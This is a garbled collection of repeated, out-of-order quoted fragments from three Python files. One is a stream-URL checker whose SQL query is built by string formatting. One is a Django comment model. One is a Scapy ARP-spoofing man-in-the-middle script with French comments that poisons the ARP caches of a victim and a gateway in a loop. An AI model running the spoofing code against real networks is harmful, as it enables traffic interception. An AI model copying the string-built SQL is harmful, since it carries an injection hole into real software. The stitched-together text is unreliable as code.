threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url'", "db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for", "= 1 if netstat > 0 else 0 item['delay'] = netstat item['udTime'] =", "import tools import time import db import threading from .threads import ThreadPool class", "-*- import tools import time import db 
import threading from .threads import ThreadPool", "url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) == 0", "1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads", "import db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class", "%s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat >", "time import db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base", "getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20)", "self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1", "== 0 : DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10:", "def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass", "\"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time()", "% (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0", "data) : DB = db.DataBase() sql = \"SELECT * FROM %s WHERE url", "(self, data) : DB = db.DataBase() sql = \"SELECT * FROM %s WHERE", "tools import time import db import threading from .threads import ThreadPool class DetectorBase(object):", "netstat > 0 else 0 item['delay'] = netstat item['udTime'] = self.now if netstat", "= tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass", "self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0 item['delay'] = netstat", "len(result) == 0 : DB.insert(data) else : id = result[0][0] if data['failcount'] >=", "netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self, data) : DB", "self.now if netstat == 0: 
item['failcount'] += 1 self.addData(item) def addData (self, data)", "== 0: item['failcount'] += 1 self.addData(item) def addData (self, data) : DB =", "utf-8 -*- import tools import time import db import threading from .threads import", "__init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def", "'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'],", "len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url'])", "DB = db.DataBase() sql = \"SELECT * FROM %s WHERE url = '%s'\"", "0 else 0 item['delay'] = netstat item['udTime'] = self.now if netstat == 0:", "item['delay'] = netstat item['udTime'] = self.now if netstat == 0: item['failcount'] += 1", "item['online'] = 1 if netstat > 0 else 0 item['delay'] = netstat item['udTime']", ": DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id) else:", "1 self.addData(item) def addData (self, data) : DB = db.DataBase() sql = \"SELECT", "netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0 item['delay']", "tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def", "netstat item['udTime'] = self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def", "WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) ==", ": DB = db.DataBase() sql = \"SELECT * FROM %s WHERE url =", "DB.query(sql) if len(result) == 0 : DB.insert(data) else : id = result[0][0] if", "addData (self, data) : DB = db.DataBase() sql = \"SELECT * FROM %s", "onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in", "self.addData(item) def addData (self, data) : DB = db.DataBase() sql = \"SELECT *", "item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat", "'%s'\" % 
(DB.table, data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data)", "0 : DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id)", "in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url']))", "= ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def", "info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url']) >", "from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self):", "# -*- coding: utf-8 -*- import tools import time import db import threading", "if netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self, data) :", "if len(result) == 0 : DB.insert(data) else : id = result[0][0] if data['failcount']", "detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self):", "else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id) else: DB.edit(id, data)", "pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems:", "data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data) else : id", "class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000)", "item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0", "if netstat > 0 else 0 item['delay'] = netstat item['udTime'] = self.now if" ]
[ "import models from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment", "from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post", "from django.db import models from model_utils.models import TimeStampedModel from apps.post.models import Post class", "model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\"", "models from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for", "Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"]", "from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table", "\"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE,", "class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering =", "apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table =", "models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def __str__(self): return self.text", "for Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post =", "coding: utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel from apps.post.models", "\"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author", "import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\"", "post = 
models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def __str__(self):", "= \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200)", "# -*- coding: utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel", "utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel from apps.post.models import", "= [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20)", "django.db import models from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel):", "[\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def", "db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text =", "ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author =", "-*- coding: utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel from", "\"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post", "= models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def __str__(self): return", "Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post,", "import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for 
Post \"\"\" class", "TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta:", "Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text", "-*- from django.db import models from model_utils.models import TimeStampedModel from apps.post.models import Post", "Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering", "class Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\")" ]
[ "srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau. timeout=2, #", "(envoyés, reçus) des answers (réponses). for snd, rcv in ans: # On renvoie", "adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST,", "snd, rcv in ans: # On renvoie l'adresse MAC de la réponse reçue.", "MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une", "as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec", "à broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant une réponse", "# build construit un paquet ARP à destination de `pdst` pour lui dire", "pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur le", "l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except", "psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip,", "obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__", "build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac", "get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de", "victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse", "iface=interface, # interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) #", "Faisons croire à pdst que psrc est à l'adresse MAC hwsrc (qui est", "l'envoie mais on CRIE sur le réseau qu'il faut qu'ils reparlent entre eux.", "construit notre paire de restauration. # i.e. 
on reconnecte le routeur et la", "return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches", "une paire de paquets ARP où gate = routeur et victim = victime.", "e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec de", "envoie 7 fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL)", "entre deux paquets. # On itère sur les couples (envoyés, reçus) des answers", "# Surtout, on l'envoie mais on CRIE sur le réseau qu'il faut qu'ils", "= \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à", "On construit notre paire de restauration. # i.e. on reconnecte le routeur et", "l'adresse MAC hwsrc (qui est la nôtre en fait) en l'envoyeant bien à", "a pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst,", "\"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC", "gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit un paquet ARP", "= gate_info victim_mac, victim_ip = victim_info # build construit un paquet ARP à", "gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire", "def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une requête ARP.", "La paire retournée sont deux paquets (p1, p2). p1 est un paquet ARP", "paquets. # On itère sur les couples (envoyés, reçus) des answers (réponses). for", "answers (réponses). for snd, rcv in ans: # On renvoie l'adresse MAC de", "paquet ARP à destination de `pdst` pour lui dire que `psrc` a pour", "échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de", "Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip,", "associée à l'IP par une requête ARP. 
\"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip),", "de paquets ARP où gate = routeur et victim = victime. La paire", "except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\")", "le réseau qu'il faut qu'ils reparlent entre eux. # (ici on crie au", "victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE", "i.e. on reconnecte le routeur et la victime entre eux. for_gate, for_victim =", "bien à l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac =", "\"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP", "MAC associée à l'IP par une requête ARP. \"\"\" ans, unans = srp(", "gate_info victim_mac, victim_ip = victim_info # build construit un paquet ARP à destination", "ans: # On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def", "inter=0.1) # intervalle entre deux paquets. # On itère sur les couples (envoyés,", "interne de VMware) inter=0.1) # intervalle entre deux paquets. # On itère sur", "hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst)", "= get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de restauration. #", "routeur et victim = victime. La paire retournée sont deux paquets (p1, p2).", "build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP", "paquet ARP à broadcaster sur le réseau. 
timeout=2, # timeout qu'on attend avant", "hwdst=hwdst) # Faisons croire à pdst que psrc est à l'adresse MAC hwsrc", "le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt:", "in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur le réseau", "construit un paquet ARP à destination de `pdst` pour lui dire que `psrc`", "intervalle entre deux paquets. # On itère sur les couples (envoyés, reçus) des", "(qui est la nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst", "# un paquet ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on", "que psrc est à l'adresse MAC hwsrc (qui est la nôtre en fait)", "de l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau (MAC adresses", "paire retournée sont deux paquets (p1, p2). p1 est un paquet ARP qui", "sur le réseau qu'il faut qu'ils reparlent entre eux. # (ici on crie", "cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible", "victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère", "itère sur les couples (envoyés, reçus) des answers (réponses). for snd, rcv in", "ARP qui dit au routeur qu'il doit s'occuper de la victime. p2 est", "au sens de, on envoie 7 fois le paquet pour être sûr qu'ils", "paire de paquets ARP où gate = routeur et victim = victime. La", "couples (envoyés, reçus) des answers (réponses). for snd, rcv in ans: # On", "ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster", "CRIE sur le réseau qu'il faut qu'ils reparlent entre eux. # (ici on", "être sûr qu'ils le reçoivent.) 
send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de", "croire à pdst que psrc est à l'adresse MAC hwsrc (qui est la", "build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie", "p2 est un paquet ARP qui dit à la victime qu'il doit maintenant", "# (ici on crie au sens de, on envoie 7 fois le paquet", "de la victime. p2 est un paquet ARP qui dit à la victime", "(ici on crie au sens de, on envoie 7 fois le paquet pour", "rcv in ans: # On renvoie l'adresse MAC de la réponse reçue. return", "for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout,", "(ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre deux paquets.", "des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On", "renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\"", "victim_mac, victim_ip = victim_info # build construit un paquet ARP à destination de", "gate = routeur et victim = victime. La paire retournée sont deux paquets", "la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build", "discuter avec le routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip", "in ans: # On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\")", "= srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau. timeout=2,", "(MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break", "`psrc` a pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2,", "On renvoie l'adresse MAC de la réponse reçue. 
return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info):", "HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def", "reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP", "timeout=2, # timeout qu'on attend avant une réponse en secondes. iface=interface, # interface", "MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc)", "return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC", "de restauration. # i.e. on reconnecte le routeur et la victime entre eux.", "Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure", "= get_mac(gate_ip) # On construit notre paire de restauration. # i.e. on reconnecte", "routeur qu'il doit s'occuper de la victime. p2 est un paquet ARP qui", "paquets ARP où gate = routeur et victim = victime. La paire retournée", "quitte la scène. 
\"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info #", "victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que", "True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__ == '__main__':", "= build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on", "import * BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip =", "gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée", "cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de", "la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!]", "on reconnecte le routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac,", "en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne de VMware)", "les couples (envoyés, reçus) des answers (réponses). for snd, rcv in ans: #", "get_mac(gate_ip) # On construit notre paire de restauration. # i.e. on reconnecte le", "vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à", "deux paquets. # On itère sur les couples (envoyés, reçus) des answers (réponses).", "victim_info): \"\"\" Crée une paire de paquets ARP où gate = routeur et", "paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\"", "et la victime entre eux. 
for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for", "victim_ip = victim_info # build construit un paquet ARP à destination de `pdst`", "unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau.", "ARP qui dit à la victime qu'il doit maintenant discuter avec le routeur", "hwsrc (qui est la nôtre en fait) en l'envoyeant bien à l'adresse MAC", "qu'il faut qu'ils reparlent entre eux. # (ici on crie au sens de,", "print(\"[+] Le cyanure va être déposé sur le réseau (MAC adresses obtenues)\") while", "sont deux paquets (p1, p2). p1 est un paquet ARP qui dit au", "= routeur et victim = victime. La paire retournée sont deux paquets (p1,", "hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac)", "le routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info", "Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible,", "= get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec", "gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac =", "pour lui dire que `psrc` a pour adresse MAC `hwsrc` build = lambda", "routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac,", "\"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur", "# i.e. on reconnecte le routeur et la victime entre eux. for_gate, for_victim", "sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy", "vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip,", "de Scapy n°1. 
\"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip,", "destination de `pdst` pour lui dire que `psrc` a pour adresse MAC `hwsrc`", "Crée une paire de paquets ARP où gate = routeur et victim =", "l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau (MAC adresses obtenues)\")", "pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est à l'adresse", "hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as", "7 fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def", "l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac", "de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire", "réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad()", "et victim = victime. La paire retournée sont deux paquets (p1, p2). p1", "ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant une", "`hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return", "l'adresse MAC associée à l'IP par une requête ARP. \"\"\" ans, unans =", "= victim_info # build construit un paquet ARP à destination de `pdst` pour", "Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) #", "gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur,", "n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)):", "On itère sur les couples (envoyés, reçus) des answers (réponses). 
for snd, rcv", "paquet ARP qui dit à la victime qu'il doit maintenant discuter avec le", "on l'envoie mais on CRIE sur le réseau qu'il faut qu'ils reparlent entre", "for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2,", "attend avant une réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le", "VMware) inter=0.1) # intervalle entre deux paquets. # On itère sur les couples", "de trouver l'adresse MAC de la cible, échec de l'attaque\") return try: gate_mac", "eux. # (ici on crie au sens de, on envoie 7 fois le", "sur le réseau. timeout=2, # timeout qu'on attend avant une réponse en secondes.", "dit à la victime qu'il doit maintenant discuter avec le routeur et nous", "\"\"\" Récupère l'adresse MAC associée à l'IP par une requête ARP. \"\"\" ans,", "for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): #", "déposé sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5)", "lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac),", "get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de restauration. # i.e.", "des answers (réponses). 
for snd, rcv in ans: # On renvoie l'adresse MAC", "sens de, on envoie 7 fois le paquet pour être sûr qu'ils le", "gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip)", "rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où gate", "BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface", "scapy.all import * BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip", "in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) #", "reparlent entre eux. # (ici on crie au sens de, on envoie 7", "réseau qu'il faut qu'ils reparlent entre eux. # (ici on crie au sens", "gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc", "nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip =", "retournée sont deux paquets (p1, p2). p1 est un paquet ARP qui dit", "du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur le", "def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où gate =", "(gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst", "# On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info,", "# interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle", "psrc est à l'adresse MAC hwsrc (qui est la nôtre en fait) en", "en réalité. 
) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e:", "est un paquet ARP qui dit au routeur qu'il doit s'occuper de la", "= \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface =", "for snd, rcv in ans: # On renvoie l'adresse MAC de la réponse", "from scapy.all import * BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\"", "victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de restauration.", "victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in", "entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate,", "on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info", "la victime. p2 est un paquet ARP qui dit à la victime qu'il", "ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le", "victime. p2 est un paquet ARP qui dit à la victime qu'il doit", "routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip))", "l'adresse MAC de la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip)", "à destination de `pdst` pour lui dire que `psrc` a pour adresse MAC", "(victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on", "paire de restauration. # i.e. on reconnecte le routeur et la victime entre", "interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre", "p2). p1 est un paquet ARP qui dit au routeur qu'il doit s'occuper", "va être déposé sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac,", "vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre deux paquets. #", "par une requête ARP. 
